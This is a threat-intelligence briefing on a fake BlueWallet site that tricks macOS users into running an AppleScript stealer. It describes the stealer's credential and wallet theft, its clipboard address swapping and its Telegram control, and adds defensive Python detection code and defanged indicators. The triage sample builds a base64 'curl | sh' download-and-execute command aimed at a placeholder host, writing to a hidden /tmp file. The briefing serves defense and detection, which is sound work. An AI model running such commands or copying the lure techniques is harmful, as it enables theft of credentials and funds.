Scammers have set up a fake BlueWallet download page that tricks macOS users into infecting their own machines with a data-stealing program. Once it runs, the malware loots saved browser logins, dozens of cryptocurrency wallets, and password managers, then quietly watches the clipboard and swaps any copied wallet address for one the attacker controls, so money you think you are sending to yourself ends up in the thief's pocket instead. Researchers at Malwarebytes Labs who analyzed the campaign stress that BlueWallet, a legitimate open source Bitcoin wallet, was not hacked. The crooks simply copied its name and branding onto a malicious page. The genuine project lives at bluewallet.io, while the imposter serves its payload from update-bluewallet[.]com.
Why this one is dangerous
The clever part is that the malware never breaks Apple's security. It talks the user into switching it off. Instead of shipping a packaged app that would have to clear Apple's notarization and quarantine checks (the gatekeeping that warns you before unsigned software runs), the fake site drops a plain script and walks you through opening it by hand in a trusted Apple tool. No operating system warning ever fires, because the victim is the one pressing play. That makes it a textbook example of a growing trend: as macOS gets harder to attack with rogue binaries, criminals are leaning on social engineering instead. We have seen the same playbook in fake software lures pushing the Atomic macOS Stealer and in spoofed developer tool sites that hijack downloads to drop stealers.
How the attack works
When you land on the fake page, it drops a file named BlueWallet Installer.applescript into your Downloads folder after a two-second delay, then rewrites its own on-screen text into setup instructions, complete with a drawn blue play triangle, telling you to open the file in Script Editor and hit play or press Command-R. Run it, and a short base64-encoded shell command fires off in the background. Decoded, it fetches a second-stage script (curl pulling confighelper_0adfeee8[.]sh from projects2026box[.]com, saved as the hidden file /tmp/.sysupd.sh, dressed up to look like a system update), then tells Script Editor to quit without saving so the evidence disappears. The second stage hides its configuration with a weak XOR scrambler (key swckR9JCD2Uu) that defeats casual string searches but is trivially reversible, and decoding it shows that the attacker's Telegram channel handles both data theft and remote control.
What it steals
The harvesting is sweeping. The stealer grabs history, cookies, logins, and bookmarks from Chrome, Firefox, Safari and other browsers; targets more than 20 desktop wallet apps (Electrum, Exodus, Atomic Wallet, Ledger Live, Trezor Suite, Bitcoin Core, Sparrow and more) plus dozens of browser-extension wallets such as MetaMask, Phantom, and Keplr; raids password managers including LastPass, 1Password, Bitwarden, Dashlane and Keeper; copies Telegram and Discord session data; sweeps up developer and cloud secrets in .aws, .ssh, .gnupg and .kube; takes the Apple Notes database; and scans the Desktop, Documents, and Downloads folders for files ending in .pem, .env, .seed, .kdbx and .wallet. To capture your Mac login password directly, it pops a dialog titled "System Preferences" asking you to re-enter your password, then verifies each guess against the system before saving it.
Persistence and live control
Stolen data is packaged with Apple's built-in ditto tool and split into 49 MB chunks to slip under Telegram's 50 MB upload cap. The malware installs a LaunchAgent so it restarts every time you log in, and a clipboard watcher continuously matches Bitcoin, Ethereum, and Solana address patterns and overwrites them with attacker addresses the instant you copy, so the swap happens silently before you paste. A polling loop turns the attacker's Telegram bot into a real-time remote control, with commands like /info, /exec, /clipboard, /download, /exfil and /selfdestruct.
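As an added example (not from the briefing or the Malwarebytes analysis), a defender-side paste check in Python: it classifies an address by chain, compares what was copied with what the clipboard holds at paste time, and matches a same-chain replacement against the attacker addresses listed in the indicators of compromise below. The address regexes are simplified assumptions, and the sample "copied" address is a public BIP173 test vector, not a real wallet.

```python
import re

# Chain address patterns (assumed, simplified): checked in this order so that a legacy BTC
# address is not mistaken for a Solana one (both are base58).
ADDRESS_PATTERNS = [
    ("BTC", re.compile(r"(bc1[qp][a-z0-9]{38,58}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})")),
    ("ETH", re.compile(r"0x[0-9a-fA-F]{40}")),
    ("SOL", re.compile(r"[1-9A-HJ-NP-Za-km-z]{32,44}")),
]

# The three attacker addresses listed in the indicators of compromise of this briefing.
KNOWN_ATTACKER_ADDRESSES = {
    "bc1qrmj4ggshddhnxx3rxwvsu8pe9ut6cgx8mx364e",
    "0x2B871703122064e45d77146a6D5203da3bD192FA",
    "8dtdRQePrKz97FszwMEa4QvptdAAcbAFs7kBojr5Mz3v",
}

def classify(text):
    """Return the chain whose address pattern the text matches in full, or None."""
    text = text.strip()
    for chain, rx in ADDRESS_PATTERNS:
        if rx.fullmatch(text):
            return chain
    return None

def check_paste(copied, clipboard_now):
    """Compare what the user copied with what the clipboard holds at paste time.

    Returns (verdict, chain): 'ok' when unchanged or not an address, 'swapped' when a
    different address of the same chain replaced it, 'swapped-known-attacker-address'
    when the replacement is one of the listed indicators, 'changed' otherwise.
    """
    copied, clipboard_now = copied.strip(), clipboard_now.strip()
    chain = classify(copied)
    if chain is None or copied == clipboard_now:
        return ("ok", chain)
    if classify(clipboard_now) == chain:
        if clipboard_now in KNOWN_ATTACKER_ADDRESSES:
            return ("swapped-known-attacker-address", chain)
        return ("swapped", chain)
    return ("changed", chain)

# Constructed walk-through: the user copies a sample bech32 address (a public BIP173 test
# vector, not a real wallet), and by paste time the clipboard holds the attacker's BTC address.
USER_COPIED = "bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4"
AT_PASTE = "bc1qrmj4ggshddhnxx3rxwvsu8pe9ut6cgx8mx364e"
```

The same check can be wired to a clipboard hook; the point is that a swap is only detectable if the original copied value is retained for comparison.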
What you should do
There is no patch here, because nothing is being exploited. The fix is to avoid the lure and watch for the behavior. Only download BlueWallet from bluewallet.io, and treat any site that asks you to open a downloaded .applescript file in Script Editor as a red flag. Defenders should alert on Script Editor spawning a one-line, base64-encoded do shell script command followed by an immediate quit, flag a hidden /tmp/.sysupd.sh fetched by curl, and consider treating .applescript files arriving from the web with the same suspicion as executables. Anyone who ran the lure should assume the Mac is compromised, rotate every credential from a clean device, and move any cryptocurrency to a brand new wallet.
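As an added example (not from the briefing or the Malwarebytes analysis), a small Python triage check over constructed process-start events that implements the two alerting heuristics above: a Script Editor child running a base64-decoded shell command, and a curl fetch into a hidden /tmp file. The event format, the regexes and the sample base64 command are assumptions; the staging hostname inside it is a placeholder.

```python
import base64
import re

# Constructed sample process-start events (assumed shape: parent app, child process, argv).
# The base64 payload is a constructed stand-in with the same shape as the dropper's command.
SAMPLE_B64_CMD = base64.b64encode(
    b"curl -fsSL https://staging.example.invalid/confighelper.sh -o /tmp/.sysupd.sh"
    b" && sh /tmp/.sysupd.sh"
).decode()

EVENTS = [
    {"parent": "Script Editor", "process": "sh",
     "argv": f"sh -c 'echo {SAMPLE_B64_CMD} | base64 -d | sh'"},
    {"parent": "Terminal", "process": "sh", "argv": "sh -c 'ls -la ~/Downloads'"},
    {"parent": "Script Editor", "process": "sh", "argv": "sh -c 'say hello'"},
]

B64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")   # long base64-looking tokens
HIDDEN_TMP_RE = re.compile(r"/tmp/\.[A-Za-z0-9_.-]+")    # dot-prefixed (hidden) file in /tmp

def decode_b64_tokens(argv):
    """Decode every long base64-looking token in argv; skip anything that is not valid base64."""
    decoded = []
    for tok in B64_TOKEN_RE.findall(argv):
        try:
            decoded.append(base64.b64decode(tok, validate=True).decode("utf-8", "replace"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded

def assess(event):
    """Return the list of heuristics an event trips (empty list means nothing suspicious)."""
    reasons = []
    if event["parent"] != "Script Editor":
        return reasons                      # both heuristics key on Script Editor as the parent
    argv = event["argv"]
    decoded = decode_b64_tokens(argv)
    if "base64" in argv and decoded:
        reasons.append("script-editor-base64-shell")
    for text in decoded + [argv]:           # look inside the decoded command first, then raw argv
        hit = HIDDEN_TMP_RE.search(text)
        if "curl" in text and hit:
            reasons.append("curl-to-hidden-tmp:" + hit.group())
            break
    return reasons

def scan(events):
    # Run assess() over a batch and keep only the flagged events with their reasons.
    return [(e["parent"], e["process"], assess(e)) for e in events if assess(e)]
```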
Indicators of compromise (defanged)
- Delivery and staging: update-bluewallet[.]com, hxxps://projects2026box[.]com/serve_site/confighelper_0adfeee8[.]sh, /tmp/.sysupd.sh
- AppleScript dropper SHA-256: 216277bdb7998b48852024fc8b5853c3dc50b3857fd22afd1320b884bcaa0a61
- Clipboard hijack addresses: BTC bc1qrmj4ggshddhnxx3rxwvsu8pe9ut6cgx8mx364e, ETH 0x2B871703122064e45d77146a6D5203da3bD192FA, SOL 8dtdRQePrKz97FszwMEa4QvptdAAcbAFs7kBojr5Mz3v
This briefing is provided by IntelFusions for informational and defensive purposes only. It is based on sources assessed to be reliable at the time of writing, and analytic judgments carry the confidence levels indicated. Indicators of compromise are defanged; re-arm them only in controlled environments. IntelFusions is not affiliated with the organizations named and makes no warranty as to completeness or accuracy.